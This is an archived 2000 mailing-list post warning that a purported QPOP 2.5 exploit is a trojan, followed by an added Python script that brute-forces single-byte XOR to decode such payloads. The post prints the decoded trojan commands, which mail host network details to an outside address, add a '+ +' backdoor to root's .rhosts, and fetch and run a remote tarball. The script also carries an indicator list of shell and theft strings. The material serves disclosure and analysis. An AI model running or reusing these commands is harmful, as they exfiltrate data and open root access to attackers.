Vulnerability Development mailing list archives

TROJAN WARNING: Re: QPOP2.5* exploit ??


From: nic () BELLAMY CO NZ (Nic Bellamy)
Date: Mon, 15 May 2000 11:13:50 +1200


The "shellcode" in this is a trojan - it is self modifying (a simple xor)
to obfuscate the real intention of the program, which is to run this
code via "/bin/sh -c" on the local machine (reformatted for readability):

  /sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null
  echo '+ +' >> ~root/.rhosts
  rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar
  tar -xvf solwar* >> /dev/null
  cd solwar
  chmod +x solwar.sh
  ./solwar.sh >> /dev/null
  cd ..
  rm -rf solwar*

The "lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar" file does not
appear to exist, so please don't flood their server trying to get it.

Regards,
        Nic.

-- Nic Bellamy <nic () bellamy co nz>
   Director, Bellamy Consulting Ltd.
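The post above describes a payload hidden behind a single-byte XOR so that the real shell commands are not visible in a plain string dump. As an added illustration of how an analyst can recover such a payload without running it (this is example code, not Nic's or anyone else's tool from the thread), the script below brute-forces all 256 single-byte XOR keys over a blob and scores each candidate by how printable it is and how many shell-style indicator strings it contains. The indicator list and the sample blob are constructed for this example; the sample uses a placeholder mail address, not the one in the post.

```python
import string

# Constructed indicator list: substrings typical of a dropped shell payload.
# The entries mirror the kinds of commands described in the post above.
INDICATORS = (b"/bin/sh", b".rhosts", b"ifconfig", b"rcp ", b"rm -rf",
              b"chmod +x", b"| mail")

PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte; the same operation
    both encodes and decodes, which is what makes the trick cheap."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> int:
    """Higher means more shell-like: one point per printable byte plus a
    heavy weight per indicator substring found in the candidate."""
    printable = sum(1 for b in candidate if b in PRINTABLE)
    hits = sum(candidate.count(ind) for ind in INDICATORS)
    return printable + 50 * hits


def brute_force_xor(blob: bytes):
    """Try every single-byte key and return (key, decoded) for the candidate
    that scores highest. Key 0 is included, so an unobfuscated blob is
    simply returned as-is."""
    best_key, best_score, best_text = 0, -1, b""
    for key in range(256):
        cand = xor_bytes(blob, key)
        s = score(cand)
        if s > best_score:
            best_key, best_score, best_text = key, s, cand
    return best_key, best_text


def find_indicators(text: bytes) -> list:
    """List which indicator strings appear in a decoded payload."""
    return [ind.decode() for ind in INDICATORS if ind in text]


# Constructed sample: a shell command line XOR-encoded with key 0x5A, standing
# in for the kind of blob an analyst would carve out of a suspicious exploit.
SAMPLE_PLAINTEXT = (b"/bin/sh -c '/sbin/ifconfig -a | mail -s report "
                    b"analyst@example.invalid'")
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, 0x5A)


if __name__ == "__main__":
    key, decoded = brute_force_xor(SAMPLE_BLOB)
    print(f"best key: 0x{key:02x}")
    print(f"decoded : {decoded.decode(errors='replace')}")
    print(f"flags   : {find_indicators(decoded)}")
```

The scoring is deliberately crude: the printable-byte count alone would let several keys tie on short inputs, so the indicator hits carry most of the weight. For multi-byte or rolling XOR keys this single-byte search will not recover the text, which is exactly the case where stepping the decoder loop under a debugger (rather than trusting a static string dump) is the safer analysis path.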

